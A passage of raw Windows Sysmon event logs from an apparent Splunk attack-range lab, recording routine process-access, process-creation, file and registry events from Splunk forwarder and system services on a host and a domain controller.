12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018520Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018519Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018518Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018517Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018516Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018515Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018514Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018513Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018512Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.191{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E629-63C7-3502-00000000B002}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018511Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.191{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E629-63C7-3502-00000000B002}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018510Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.191{E5A8D418-E629-63C7-3502-00000000B002}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018555Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.996{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=9C66E050B6FEAF3D0B63CC0CDFAAD56E,SHA256=B5791A6CE9BED851751955170343FDAA2F5BB27039601D86F7919F0B60BA083F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018554Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.699{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02C652D87F23ACCC1F74A38EEDC3AD8,SHA256=71720144B9AB4F4D941889141F55071AAB64EF6661E2656AEC9BEE0D4DABC898,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000046288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000046287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002fc1a5) 13241300x800000000000000046286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b30-0x21078806) 13241300x800000000000000046285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b38-0x82cbf006) 13241300x800000000000000046284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0xe4905806) 13241300x800000000000000046283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000046282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002fc1a5) 13241300x800000000000000046281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b30-0x21078806) 13241300x800000000000000046280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b38-0x82cbf006) 13241300x800000000000000046279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:29:30.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0xe4905806) 10341000x800000000000000046278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.423{FE4C2B44-E62A-63C7-8206-00000000AF02}56405328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E62A-63C7-8206-00000000AF02}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E62A-63C7-8206-00000000AF02}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.283{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E62A-63C7-8206-00000000AF02}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.285{FE4C2B44-E62A-63C7-8206-00000000AF02}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000046269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.205{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=593AED3BAE1AD439579051A26BD16DBF,SHA256=758BCA1AE31CC38FC1C3D5DF21F9F25FA2E3971B092B7F72B8252E5083E2F2F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.536{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56461-false10.0.1.12-8000- 10341000x800000000000000018553Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E62A-63C7-3702-00000000B002}2592C:\Program 